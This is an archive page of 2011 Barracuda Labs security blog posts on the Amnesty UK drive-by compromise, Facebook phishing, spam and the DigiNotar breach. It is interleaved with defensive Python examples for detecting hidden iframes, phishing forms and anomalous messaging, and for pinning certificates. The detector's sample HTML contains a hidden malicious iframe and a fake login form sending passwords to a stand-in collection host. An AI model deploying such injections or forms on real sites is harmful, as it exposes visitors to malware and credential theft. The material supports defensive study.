Archive for the ‘Current Events’ Category

Human Rights Group Used to Spy on Activists

Thursday, December 22nd, 2011

By Paul Royal, Research Consultant

Amnesty International’s UK website has been compromised and is serving drive-by downloads. Historical data indicates that the AIUK website was compromised on or before Friday, December 16.

Details:

Visiting hxxp://www[.]amnesty[.]org[.]uk loads hxxp://3max[.]com[.]br/cgi-bin/ai/ai.html via an iframe. 3max.com.br, itself a legitimate but compromised Brazilian automotive website, serves malicious Java content (stolen from the Metasploit project) that targets CVE-2011-3544, a vulnerability in the Rhino script engine of Oracle Java that an untrusted applet can use to run arbitrary code outside the Java sandbox. If the exploit succeeds, malware is installed on the visitor’s system.

Details of Vulnerability Targeted by the Exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544
VirusTotal Detections for Exploit
http://www.virustotal.com/file-scan/report.html?id=1cc214cee10f02d37359c0e3d04fd57899333c4b1eaa81489c74e5c2fa17c3a8-1324068153
VirusTotal Detections for Exploit Payload
http://www.virustotal.com/file-scan/report.html?id=0e53832e1c36d34a3d05c05f73ebab22a74ade95c5f3b7d9f74fad4f56d10023-1324067892

The exploit payload has the properties of targeted malware, yet it is being served through the compromise of a popular, public website. The working theory for this anomaly relates to Amnesty International’s role as a human rights non-governmental organization: certain governments use zero-day exploits and other techniques to gather electronic information about the activities of human rights activists. A subset of those activists are too careful to click on links in even well-worded spearphishing emails. But compromise a website they frequent (Amnesty International, for example) and the targets come to you. The context-specific damage potential is significant.

Amnesty International UK has been notified about the compromise.


How your facebook password was stolen, and why

Monday, December 19th, 2011

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

 

Here’s something we hear regularly at Barracuda Labs…

“My mom called me and said that someone posted something bad on her facebook.  How did they do that? What should I tell her?”

Our two-part answer is simple.  First, mom probably clicked on something and unwittingly gave it permission to post to her wall.  Second, there is always a possibility that mom had her password stolen.   She should change her Facebook password at once, as well as change the password on any service where she might have used that same password.

Facebook passwords do get stolen.  Below is one example of how that happens.

 

It starts with a message like this one that spreads from one wall to another.

malicious facebook post

Clicking on the link in the message opens up what looks like a Facebook login page.

fake facebook login page


Facebook does re-prompt for a login in some situations to confirm that you are properly authenticated, which is what makes this page plausible. In this case, though, the login page is entirely fake and is not part of Facebook at all.

Suppose you were in a hurry and didn’t take time to look at the URL of the page.   If you fill in your information and press the Login button, here’s what happens:

results of pressing 'Login'


 

As you can see in the image, your username and password are sent, exactly as typed, to the Russian domain shown, which has nothing to do with Facebook. Once this is done, the browser is redirected to a Facebook-themed ‘survey’ site.

facebook themed 'survey' site


These ‘survey’ sites offer some gift in exchange for participating in an endless cycle of marketing schemes, many of which ask for personal information and none of which ever deliver the promised gift.
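The two compromises on this page share a mechanical signature that can be checked on fetched HTML: an injected iframe that points at a third-party host and is sized so the visitor never sees it (the Amnesty International case above), and a login form whose password field submits to a host that is not the site the page imitates (the Facebook case here). The following is an added example, not code from either post or from Barracuda Labs. It uses only the Python standard library; the three sample pages, the hostnames in them other than the iframe target reported in the Amnesty post, and the names audit_page and PageAuditor are all constructed for the example.

```python
"""Added example: flag hidden third-party iframes and off-site credential
forms in a page's HTML. Standard library only; the sample pages at the
bottom are constructed for illustration, not captured traffic."""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _host(url):
    """Lower-cased host of an absolute URL, or '' for a relative one."""
    return (urlparse(url).hostname or "").lower()


def _is_hidden(attrs):
    """True when an iframe is sized or styled so the visitor never sees it."""
    dims = [attrs.get(k, "").strip().rstrip("px") for k in ("width", "height")]
    style = attrs.get("style", "").replace(" ", "").lower()
    return (any(d in ("0", "1") for d in dims)
            or "display:none" in style
            or "visibility:hidden" in style
            or "hidden" in attrs)


class PageAuditor(HTMLParser):
    """Collects (finding, target) pairs while parsing one page."""

    def __init__(self, page_url, login_host):
        super().__init__()
        self.page_host = _host(page_url)
        self.login_host = login_host  # site the login form claims to be, or None
        self.findings = []
        self._form = None  # state of the <form> currently open, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # bare attributes become ''
        if tag == "iframe":
            src = a.get("src", "")
            src_host = _host(src)
            if src_host and src_host != self.page_host and _is_hidden(a):
                self.findings.append(("hidden-external-iframe", src))
        elif tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag != "form" or self._form is None:
            return
        form, self._form = self._form, None
        if not form["has_password"]:
            return
        # A relative action submits back to the page's own host.
        target = _host(form["action"]) or self.page_host
        if self.login_host:
            ok = target == self.login_host or target.endswith("." + self.login_host)
            kind = "off-brand-credential-form"
        else:
            ok = target == self.page_host
            kind = "cross-origin-credential-form"
        if not ok:
            self.findings.append((kind, form["action"] or self.page_host))


def audit_page(html, page_url, login_host=None):
    """Return findings for html served at page_url.

    login_host ('facebook.com') is the site the login page claims to belong
    to; when given, a password form submitting anywhere else is flagged even
    if the phishing page posts back to itself.
    """
    auditor = PageAuditor(page_url, login_host.lower() if login_host else None)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample pages (not captured traffic).
INJECTED_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="http://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="http://3max.com.br/cgi-bin/ai/ai.html" width="0" height="0"></iframe>
</body></html>"""

PHISHING_PAGE = """<html><body><h2>Facebook Login</h2>
<form method="post" action="http://collect.example.ru/grab.php">
<input name="email"><input type="password" name="pass">
<input type="submit" value="Log In"></form></body></html>"""

REAL_LOGIN_PAGE = """<html><body><form method="post" action="/login.php">
<input name="email"><input type="password" name="pass"></form></body></html>"""

if __name__ == "__main__":
    print(audit_page(INJECTED_PAGE, "http://www.amnesty.org.uk/"))
    print(audit_page(PHISHING_PAGE, "http://login-facebook.example.ru/verify.php", "facebook.com"))
    print(audit_page(REAL_LOGIN_PAGE, "https://www.facebook.com/login.php", "facebook.com"))
```

The visible YouTube embed in the first page is deliberately left unflagged: third-party iframes are normal, and it is the combination of a foreign host with a zero-sized or hidden frame that marks a drive-by injection. For the credential check, pass the brand the page is pretending to be; a phishing page that posts to its own host would otherwise look consistent to a same-origin test.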

 

The remaining question is why criminals steal Facebook passwords, and there are three good answers.

1. Personal information on your Facebook account can be used to piece together full-fledged identity theft.

2. A stolen Facebook account is the perfect vehicle for carrying out the Stranded Traveler scam, in which the account’s friends receive a message claiming that the owner is stuck abroad, has been robbed and needs money wired right away.

3.  Survey scammers such as the ones shown here have to start their viral campaigns somewhere, and a stolen account, with its hundreds of trusting friends, is the perfect place to start.

 

With the new Facebook Timeline rolling out this week, users should be particularly careful with the personal information they make available on their pages.  As always, Barracuda Networks recommends that you be cautious with what you click on and change your password regularly as a matter of course.


Barracuda Networks Turns ‘Follows’ and ‘Likes’ into Meals for Children in Need

Wednesday, November 30th, 2011

By: Barracuda Labs

FOR IMMEDIATE RELEASE

Content Security Leader Challenges World with “Clicks for Meals” to Fight Hunger and Provide 10,000 Meals this Holiday Season

Campbell, Calif. (November 30, 2011) – In an effort to combat world hunger, Barracuda Networks is challenging the world to help provide 10,000 meals for hungry children this holiday season. From November 30 until December 31, Barracuda Networks’ new one-for-one campaign−outlined at www.barracuda.com/clicksformeals−offers three free, simple ways everyone can help donate meals to starving children around the world.

Barracuda Networks will provide one meal for each of the following:

“We spend a lot of time analyzing how attackers use social networks for bad−stealing identities, creating fake profiles, spreading malware and so forth,” said Dr. Paul Judge, chief research officer of Barracuda Networks. “We want to use the social networks to do some good. What better way to do that than to use the power and ease of Facebook and Twitter to raise awareness and money to fight hunger.”

Barracuda Networks will work with the United Nations World Food Programme to fulfill the meal donation as they continue to fight hunger worldwide. Additional information–including a one-minute video–about the campaign is available at www.barracuda.com/clicksformeals.

“Attackers have proven time and again the enormous opportunity social networks create for malicious activity online,” continued Judge. “This initiative is a small token and acknowledgement of our continued fight to keep social networks safe and make an impact on thousands of children’s lives around the world.”

About Barracuda Profile Protector
Barracuda Profile Protector is a free service that protects social networking users against malicious threats on Facebook and Twitter. The application analyzes user-generated content posted to profiles and is able to block or remove malicious or suspicious content. This includes malicious URLs, embedded photos and/or videos on Facebook and Twitter pages and news feeds. Users can install Profile Protector at www.profileprotector.com.

About Barracuda Labs
Barracuda Labs is a global multi-disciplinary research and threat analysis team that fulfills a critical role in developing innovative technologies across Barracuda Networks’ business areas. The team evaluates the threat ecosystem and creates security intelligence to defend Barracuda Networks customers. Barracuda Labs’ threat research areas, which include email, Web, network and cloud security and technology, are designed to improve the world’s security posture by promoting security awareness and education, developing and innovating new defense technologies, and working with government and law enforcement agencies to reduce cybersecurity crime. For more information, please visit www.barracudalabs.com.

About Barracuda Networks Inc.
Barracuda Networks combines premises-based gateways and software, virtual appliances, cloud services, and sophisticated remote support to deliver comprehensive content and network security, data protection and application delivery solutions. The company’s expansive product portfolio includes offerings for protection against email and Web threats as well as products that improve application delivery and network access, message archiving, backup and data protection. Coca-Cola, FedEx, Harvard University, IBM, L’Oreal, and Europcar are among the more than 150,000 organizations protecting their IT infrastructures with Barracuda Networks’ range of affordable, easy-to-deploy and manage solutions. Barracuda Networks is privately held with its International Headquarters in Campbell, Calif. For more information, please visit www.barracudanetworks.com.


Seven Annoying Attacks That Facebook Misses

Wednesday, November 16th, 2011

This week Facebook experienced a rash of attacks that posted pornographic images. Some even claimed to be nude celebrities and others claimed to be child pornography. Last month we released survey results that showed that 40% of Facebook users do not feel safe on Facebook. Two weeks later, Facebook released an infographic showing its security initiatives and statistics. We applaud the efforts; however, more is needed. When you are trying to grow a social network as well as increase advertising revenue, security becomes not only a lower priority but sometimes a conflict of interest.

Facebook claims that only 0.5% of users experience spam on any given day. That is still about 2 million people out of the 400 million users who log in on any given day. We suspect that measurement counts only the spam Facebook catches, which is clearly not 100% of the spam. While working on Profile Protector and other web security intelligence, we regularly come across examples of spam and attacks that repeatedly use similar approaches that are detectable. We compiled this list of seven annoying attacks that Facebook misses.

1) Fake Product Pages:

Knock-off luxury goods have always been popular scams.  You might think you are buying your mother a nice new purse for a great price.  If you actually get the product, which is a bit of a long shot, you are likely to find that the quality you expected from the brand is lacking at best.  Facebook is rife with pages promoting these goods. Somehow these pages remain long-lived even after user complaints, and once they finally are shut down there are already eight duplicate pages running the same scam.  Some brands clearly do not run hundreds of Facebook photo albums as their advertising platform, so pages doing exactly that in the name of Christian Louboutin, Louis Vuitton, Air Jordan or Beats By Dre should be easy to spot.

 

2) Manipulated Account Recommendations:

On social networks those with bad motives have figured out how to game the recommendation system and use it to their advantage. This is very similar to how attackers have used search engine optimization to promote their malware. Friends are recommended in a variety of ways, but one easily exploited channel is shared apps.  Spammer accounts sign up for the same popular apps that real users do, and before too long they are showing up in your list of recommended friends, which snowballs nicely into a foothold in the recommended list for each of your friends.

 

3) Affiliate Spam:

Affiliate spam is a bigger and bigger part of the typical user’s incoming stream. Usually relying on the images of established and trusted brands, these scams tend to be very successful and take little work for those who run them.  The hook is usually a free gift card or, in some cases, something as extravagant as a new iPad. They encourage or require the user to share the post with all their friends and say something like “I love Olive Garden” before being redirected to a never-ending series of offers (premium text messaging, video rental and recurring subscriptions of all kinds) that the user is required to sign up for to get the supposed “free” gift card.  A run featuring a Starbucks gift card was successful enough that Starbucks corporate had to comment, letting users know it was not legitimate.


 

4) Photo Tagging For Spam:

The Facebook infographic referenced above mentions “PhotoDNA”, but PhotoDNA is a robust-hash system for matching known child-exploitation images; it does nothing against ordinary spam photos.  Photo tagging is one of the most popular methods of spamming through the network, but it doesn’t seem to be getting much attention.  With each image uploaded, a spammer can tag as many as 50 other accounts in a photo and have as many as 200 photos in an album.  Since each Facebook account can have up to 5,000 friends, a single photo can reach a quarter of a million people.  This gives a very favorable multiplier of users reached per byte uploaded, especially on a network where people spend as much time as they do on Facebook.  Some basic image analysis will tell you whether there are really 40 people in the picture or whether it is just a pair of Hello Kitty heels.

 

5) Fake Apps

Fake apps, malicious apps, misleading apps, whatever you want to call them, Facebook is overflowing with them.  New examples show up daily, often promising users features that they wish Facebook would provide.  After all, don’t we all want to know whether that old flame still looks us up every few days? Or don’t we all wait for the launch of a ‘dislike’ button?  It is a big network and these are going to exist from time to time anywhere, but it is becoming more like the shareware sites of the late ’90s, where most of the programs were of low quality and a relatively high percentage of them posed a risk.  Usually they are in the information-gathering and spamming business, but we have found examples that link to malicious binaries.

 

6) Stolen Pictures

There is not really a set of sextuplets each with the same bikini picture as their personal profile picture. Those are fake accounts. The photo album that has the same two images, one of the front view of a bikini and the other of the back view of a different bikini, repeated 15 times each is not a real user. Certainly there are some images that will be common to multiple people, such as a team logo or a newly released album cover. However, the fake accounts typically use images of a salacious nature.  Sex sells, and these profiles do very well at gathering followers around a fake identity, only to occasionally slip an advertisement into the stream.  Of course there is always the possibility that we’ve stumbled upon a set of identical sextuplets who would be very happy to reconnect…

 

7) Anomalous Behavior

Finally, Facebook and social networks in general should focus on some form of anomaly detection.  We’ve all seen examples of that friend who you never really talk to, and probably weren’t that interested in “friending” anyway, posting on your wall or messaging your account encouraging you to get a free iPad or a trip on Southwest Airlines, etc.  Similar problems have been appropriately mitigated elsewhere in messaging, but social networks have a long way to go.  In many ways we’re seeing the same problems that the security community has been dealing with for more than a decade. Instead of SMTP and a distributed network, more and more messaging is pushed over HTTP and closed networks that give the receiver little they can do in the way of securing themselves. Looking for behavior that is an outlier to the normal pattern is a well-understood approach in other areas of network and messaging security. If someone who never uses chat is suddenly chatting with dozens of people and forwarding the same link, there is a high likelihood of suspicious activity.
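The chat case at the end of this list is a baseline-versus-burst comparison, and it can be written down concretely. The following is an added example, not part of the original post or of Profile Protector: it builds a per-sender daily baseline from 30 days of history, then flags a sender whose volume in the last hour is far above that baseline and who pushed one URL to many distinct recipients. The log line format, the user names, the threshold values and the function names are all assumptions made for the example, and the log itself is synthetic.

```python
"""Added example: outlier detection over a synthetic social-messaging log.
A sender is flagged when the last hour's volume is far above that sender's
own daily baseline AND one URL went to many distinct recipients."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

URL_RE = re.compile(r"https?://\S+")


def parse_log(lines):
    """'2011-11-15T11:50:00 alice -> bob: text' -> (time, sender, recipient, text).
    The line format is this example's own assumption."""
    events = []
    for line in lines:
        stamp, rest = line.split(" ", 1)
        sender, rest = rest.split(" -> ", 1)
        recipient, text = rest.split(": ", 1)
        events.append((datetime.fromisoformat(stamp), sender, recipient, text))
    return events


def find_outliers(events, now, history_days=30, window=timedelta(hours=1),
                  burst_factor=10, min_fanout=5):
    """Return one alert dict per sender whose recent activity is anomalous."""
    hist_start, win_start = now - timedelta(days=history_days), now - window
    hist_count, contacts, recent = defaultdict(int), defaultdict(set), defaultdict(list)
    for t, sender, recipient, text in events:
        if hist_start <= t < win_start:
            hist_count[sender] += 1
            contacts[sender].add(recipient)
        elif win_start <= t <= now:
            recent[sender].append((recipient, text))

    alerts = []
    for sender, msgs in recent.items():
        # Expected messages in one window, scaled from the sender's daily rate;
        # a sender with no history at all gets the floor of min_fanout.
        expected = hist_count[sender] / history_days * (window / timedelta(days=1))
        burst = len(msgs) > max(min_fanout, burst_factor * expected)
        url_targets = defaultdict(set)
        for recipient, text in msgs:
            for url in URL_RE.findall(text):
                url_targets[url].add(recipient)
        url, targets = max(url_targets.items(), key=lambda kv: len(kv[1]),
                           default=(None, set()))
        if burst and len(targets) >= min_fanout:
            alerts.append({"sender": sender, "messages": len(msgs),
                           "expected": round(expected, 3), "url": url,
                           "fanout": len(targets),
                           "new_contacts": len(targets - contacts[sender])})
    return alerts


def constructed_log():
    """Synthetic log: alice chats a little and dave a lot every day; mallory has
    never chatted, then pushes one link to eight people in the final hour."""
    now = datetime(2011, 11, 15, 12, 0, 0)
    lines = []
    for day in range(1, 31):
        t = now - timedelta(days=day)
        for i in range(4):
            lines.append(f"{(t + timedelta(minutes=i)).isoformat()} alice -> "
                         f"{['bob', 'carol'][i % 2]}: lunch?")
        for i in range(50):
            lines.append(f"{(t + timedelta(minutes=i)).isoformat()} dave -> friend{i % 10}: hey")
    for i in range(3):
        lines.append(f"{(now - timedelta(minutes=30 - i)).isoformat()} alice -> bob: "
                     "see http://example.org/photos")
    for i in range(7):
        lines.append(f"{(now - timedelta(minutes=20 - i)).isoformat()} dave -> "
                     f"friend{i % 2}: http://example.org/a")
    for i in range(8):
        lines.append(f"{(now - timedelta(minutes=10 - i)).isoformat()} mallory -> "
                     f"victim{i}: free iPad! http://example.net/ipad")
    return now, lines


if __name__ == "__main__":
    now, lines = constructed_log()
    for alert in find_outliers(parse_log(lines), now):
        print(alert)
```

The point of keeping a per-sender baseline is visible in the synthetic data: dave sends seven link messages in the window but averages fifty chats a day, so he stays under his own threshold, while mallory, with no chat history, trips both the burst test and the fan-out test, and every one of her recipients is a contact she has never messaged before.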


Muammar Gaddafi – 419 spam’s new favorite subject

Friday, October 21st, 2011

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

When you are engaged in direct marketing, your first order of business is to get the attention of your customer.  This is just as true for Nigerian 419 spammers as it is for everyone else, and widespread news coverage of the recent death of Muammar Gaddafi is a gift for the Lads from Lagos.

The spam monitors at Barracuda Labs have been detecting a steady stream of these spams, where the family of a dead African prince has been hastily replaced by the son of the dead Libyan dictator.

Gaddafi-themed spam


 

Of course, by now, we hope that all email users recognize this sort of spam as an attempt to perpetrate Advance Fee Fraud. The spammers pump any respondent for personal financial information and then string them along with promises of millions of dollars once a few paltry ‘fees’ are paid in advance – thus the name, Advance Fee Fraud.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails.


Spammers exploit Steve Jobs death

Friday, October 7th, 2011

By Dave Michmerhuizen – Security Researcher

Apple Chairman Steve Jobs passed away on October 5, 2011. We all share in the sadness of losing such a technology leader, visionary and innovator. Steve impacted our lives in a multitude of positive ways, through his spirit, his creativity and the world-class products he brought to market. Apple’s offerings are both mainstream tools and sources of joy, solving problems and brightening lives every day, all over the world.  We wish for peace for Steve Jobs and his family.

Unfortunately, while many are mourning, others are trying to take advantage of them. Only 24 hours after Jobs’ death, spammers began sending insensitive emails claiming he was still alive.

Steve Jobs spams

Spams like these capitalize on their shock value. The senders hope that you will be curious just long enough to let down your guard and click on the link.

By now we should all know that these links lead to no good.  Merely clicking on the link in one of these emails leads to a compromised website which redirects the browser multiple times, in some cases finally delivering it to a host serving up the BlackHole exploit kit.

Barracuda Labs is seeing more and more instances of spam linking to servers hosting these exploit kits.   They are increasingly popular with malware distributors because, once the link has been clicked, no further user interaction is required to install the payload: the kit fingerprints the visiting browser and its plugins and fires whichever exploit fits.

It saddens us to see these emails in our honeypots.   Don’t let the amoral scum who send these things take advantage of you. If you see them, delete them right away.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails, while customers using Barracuda Web Filters or Barracuda Web Security Flex are protected from the payload.


Certificate Authority Hacked, Google Users Fall Victim to Man-in-the-Middle Attack

Tuesday, August 30th, 2011

by Daniel Peck, Research Scientist

Yesterday reports began to trickle in that Google users in Iran had fallen victim to a man-in-the-middle attack through the use of an illegitimate SSL certificate issued for “*.google.com”.  This is the latest in a series of events involving a hacked Certificate Authority, but this time there was clear evidence that the fake certificate was being actively used.  Details of the attack and its consequences are being written about extensively elsewhere, so we will give a brief overview and link to those directly involved and to others with particularly insightful analysis.

The certificate being used was issued by a Dutch certificate authority, DigiNotar. The consequence is that this CA has essentially been given the “death penalty”. Microsoft, Mozilla and Google have removed the DigiNotar root certificate from their trust stores, so certificates signed by DigiNotar will have no more trust than one you generate yourself.  It is good to see that those in the strongest position to choose which certificate authorities to trust are doing the right thing here; with a technology that so many people rely on for security, privacy and economic reasons, a “one strike and you’re out” system is appropriate.  Note that a wildcard certificate for *.google.com is accepted for any host under google.com, so a single rogue certificate covers Gmail, Docs and every other Google service the victims used.  With each attack similar to this one, we see that the current system of Certificate Authorities, with its combination of centralized and opaque trust, is quite open to abuse, and compromises of that trust can have severe consequences.  The system is clearly broken, and while some are working on replacement solutions, it is what we have to use in the meantime.

Users are advised to remove the DigiNotar root certificate.

Firefox:
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert

Chrome:
http://googlechrometutorial.com/google-chrome-advanced-settings/Google-chrome-ssl-settings.html

IE:
Newer versions of Windows receive an updated Certificate Trust List automatically and are therefore protected without a software update: “All supported editions of Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2 use the Microsoft Certificate Trust List to validate the trust of a certificate authority. There is no action required for users of these operating systems because Microsoft has removed the DigiNotar root certificate from the Microsoft Certificate Trust List.”

Older versions of Windows, however, do not get automatic protection: “Microsoft will release a future update to address this issue for all supported editions of Windows XP and Windows Server 2003.”

http://www.microsoft.com/technet/security/advisory/2607712.mspx

The DigiNotar root is being removed from the relevant Barracuda Networks products.
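The Iranian case is exactly the failure that a first-seen memory such as Certificate Patrol and a notary scheme such as Convergence (both listed under tools below) are meant to catch: the victim’s browser sees a validly signed *.google.com certificate that no vantage point outside the attacker’s network sees. The following is an added example, not the post’s own code and not the code of either tool: a per-host pin of the first accepted certificate combined with a majority check against independent notaries. The certificate bytes are placeholders (only their SHA-256 fingerprints matter here), the notary reports are constructed, and the class and method names are the example’s own.

```python
"""Added example: Certificate Patrol-style first-seen memory plus a
Convergence-style notary majority check. Certificate bytes below are
placeholders (only their fingerprints matter); notary reports are constructed."""
import hashlib
from collections import Counter


def fingerprint(cert_der):
    """SHA-256 fingerprint of a DER-encoded certificate, as browsers show it."""
    return hashlib.sha256(cert_der).hexdigest()


def notary_verdict(observed_fp, notary_fps, quorum):
    """Compare what this client sees with what independent vantage points see.

    notary_fps holds one fingerprint per notary, or None where a notary could
    not be reached (a censoring network may block them too).
    Returns (verdict, number of notaries agreeing with the client).
    """
    reports = [fp for fp in notary_fps if fp is not None]
    if len(reports) < quorum:
        return "insufficient-data", 0
    agree = Counter(reports).get(observed_fp, 0)
    return ("ok" if agree >= quorum else "mitm-suspected"), agree


class CertificateWatch:
    """Remembers the first certificate seen per host and cross-checks changes."""

    def __init__(self, quorum=3):
        self.quorum = quorum
        self.seen = {}  # host -> fingerprint this client previously accepted

    def check(self, host, cert_der, notary_fps):
        fp = fingerprint(cert_der)
        previous = self.seen.get(host)
        verdict, _ = notary_verdict(fp, notary_fps, self.quorum)
        if verdict == "ok":
            self.seen[host] = fp  # accept; a confirmed change is a legitimate rotation
            return "ok" if previous in (None, fp) else "rotated"
        if verdict == "insufficient-data" and previous == fp:
            return "ok-by-pin"  # notaries unreachable, but the pin still matches
        if previous is not None and previous != fp:
            return "changed-and-unconfirmed"  # the Patrol alarm: new cert nobody else sees
        return verdict


# Placeholder "certificates": stand-ins for DER bytes, not real certificates.
GENUINE_CERT = b"placeholder DER: *.google.com issued by Google's usual CA"
ROGUE_CERT = b"placeholder DER: *.google.com issued by DigiNotar"
ROTATED_CERT = b"placeholder DER: *.google.com, next genuine certificate"

if __name__ == "__main__":
    watch = CertificateWatch(quorum=3)
    outside_view = [fingerprint(GENUINE_CERT)] * 5  # five notaries outside Iran
    print(watch.check("www.google.com", GENUINE_CERT, outside_view))  # ok
    print(watch.check("www.google.com", ROGUE_CERT, outside_view))  # changed-and-unconfirmed
    print(CertificateWatch().check("www.google.com", ROGUE_CERT, outside_view))  # mitm-suspected
```

Two edge cases are worth noting. A genuine certificate rotation is accepted because the notaries confirm the new fingerprint, so the pin is updated rather than alarmed; and when the notaries are unreachable (which a network capable of the Iranian interception could arrange), the client falls back to its own pin, which still catches a certificate that differs from the one it accepted before, while a first visit with no pin and no notaries can only report that it has insufficient data.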

 

Further reading:

Google Online Security Blog: An Update on Attempted Man-in-the-Middle Attacks

DigiNotar Response: Diginotar Reports Security Incident

EFF: Iranian Man-in-the-Middle Attack Against Google Demonstrates Dangerous Weakness of Certificate Authorities

 

Tools/Possible SSL Alternatives for advanced users:

Certificate Patrol for Firefox

Convergence

 


DoSing the security community with a ToS

Wednesday, July 6th, 2011

by Daniel Peck, Research Scientist

The security community echo chamber was rocking hard over the weekend with news of an online backup/sharing service, Dropbox, changing its Terms of Service to grant itself “worldwide, non-exclusive, royalty-free, sublicenseable rights to…” do basically anything it wants with your content.  From Dropbox’s point of view, this is the sort of thing it claims it needs in order to provide you the service. That may or may not be true, but it was probably something its legal counsel said would be in its best interest to include.

The odd part is that anyone in the security community was surprised by this. It does not matter what the ToS said. The fact of the matter is that if you are uploading information to a third party in a form that is not encrypted under keys you control, then it needs to be considered public. The only question at that point is how long before everyone else knows it’s public.  Someone who isn’t you can read it, and you’re putting your trust in them not to reveal it, share it or profit from it. In practice this may mean that your information is never revealed, or that it is revealed when someone compromises their service, or that it is revealed when they decide to change their ToS, which every ToS tends to allow the provider to do without much notice and with little, if any, recourse.

Too many of us have forgotten, or never learned, that everything on the interwebs is public by default unless you’re making a real effort to restrict access. Ultimately, there are just gradients of how public that information actually is. Dropbox and similar services are great for what they are: a convenient place to put slides and other random files that you want to be able to access or share easily and don’t mind if someone else sees if they put a little effort into doing so.  Essentially, it is an alternative to sending an email with an attachment, and it has about the same amount of (in)security.
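The practical consequence of the argument above is to encrypt before uploading, under a key the provider never sees, so that whatever the ToS grants the provider rights to is opaque to it. The following is an added example, not the post’s own: it seals a file with a passphrase using only the Python standard library (PBKDF2-HMAC-SHA256 to derive two keys, an HMAC-SHA256 keystream in counter mode for confidentiality, and an encrypt-then-MAC tag that is verified before anything is decrypted). The function names and the 100,000-iteration count are the example’s own choices.

```python
"""Added example: encrypt a file under a key only you hold before uploading it,
using only the Python standard library. Construction: PBKDF2-HMAC-SHA256 for
two keys, an HMAC-SHA256 keystream in counter mode, and an encrypt-then-MAC
tag verified before anything is decrypted."""
import hashlib
import hmac
import os
import struct

PBKDF2_ROUNDS = 100_000  # this example's choice; raise it for real use


def derive_keys(passphrase, salt):
    """Two independent 32-byte keys (encryption, MAC) from a passphrase."""
    material = hashlib.pbkdf2_hmac("sha256", passphrase, salt, PBKDF2_ROUNDS, dklen=64)
    return material[:32], material[32:]


def _keystream(enc_key, nonce, length):
    """HMAC-SHA256(enc_key, nonce || counter) blocks, concatenated to `length` bytes."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal(passphrase, plaintext):
    """Return salt || nonce || ciphertext || tag; the blob is safe to hand to a provider."""
    salt, nonce = os.urandom(16), os.urandom(16)
    enc_key, mac_key = derive_keys(passphrase, salt)
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    return salt + nonce + ciphertext + tag


def unseal(passphrase, blob):
    """Return the plaintext, or None if the tag fails (tampering or wrong passphrase)."""
    if len(blob) < 64:
        return None
    salt, nonce, ciphertext, tag = blob[:16], blob[16:32], blob[32:-32], blob[-32:]
    enc_key, mac_key = derive_keys(passphrase, salt)
    expected = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):  # constant-time compare, checked first
        return None
    return bytes(c ^ k for c, k in zip(ciphertext, _keystream(enc_key, nonce, len(ciphertext))))


if __name__ == "__main__":
    blob = seal(b"correct horse battery staple", b"slides for Tuesday's talk")
    print(len(blob), "bytes stored at the provider, which cannot read them")
    print(unseal(b"correct horse battery staple", blob))
    print(unseal(b"wrong passphrase", blob))  # None
```

What the provider stores is salt, nonce, ciphertext and tag; it still learns the file’s size and when you access it, which is the remaining gradient of “public” the post describes. A fresh salt and nonce per file mean the same document uploaded twice produces different blobs, so the provider cannot even tell that two uploads are identical. For anything beyond an illustration, prefer an AEAD such as AES-GCM or ChaCha20-Poly1305 from a vetted library rather than a hand-assembled construction.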
